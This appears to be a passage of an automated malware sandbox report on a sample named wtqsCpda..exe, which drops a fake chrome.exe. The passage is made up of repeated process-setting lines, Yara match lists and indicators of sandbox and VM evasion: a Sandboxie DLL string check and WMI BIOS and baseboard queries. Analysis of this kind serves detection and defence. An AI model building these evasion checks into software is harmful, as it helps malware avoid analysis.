                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: 15.0.wtqsCpda..exe.540000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.chrome.exe.a20000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.chrome.exe.760000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.chrome.exe.760000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.0.wtqsCpda..exe.540000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.wtqsCpda..exe.2b22c9c.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.0.wtqsCpda..exe.540000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.chrome.exe.a20000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.chrome.exe.a20000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.chrome.exe.a20000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.0.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.chrome.exe.a20000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.wtqsCpda..exe.2b22c9c.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000000.80248070314.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.80097480691.0000000000762000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.80087663971.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.83499752484.0000000000762000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.80247515540.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.80088120152.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.79892756744.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.79892233843.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.80404784517.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.80246486829.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.79893250831.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.80311999722.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.80246995488.0000000000A22000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.79893776213.0000000000542000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.80316124713.0000000002B22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: wtqsCpda..exe PID: 1033924, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: schtasks.exe PID: 1034124, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: chrome.exe PID: 1034204, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: chrome.exe PID: 6672, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\wtqsCpda..exe, type: DROPPED
                      Source: chrome.exe, chrome.exe, 00000013.00000000.80248070314.0000000000A22000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
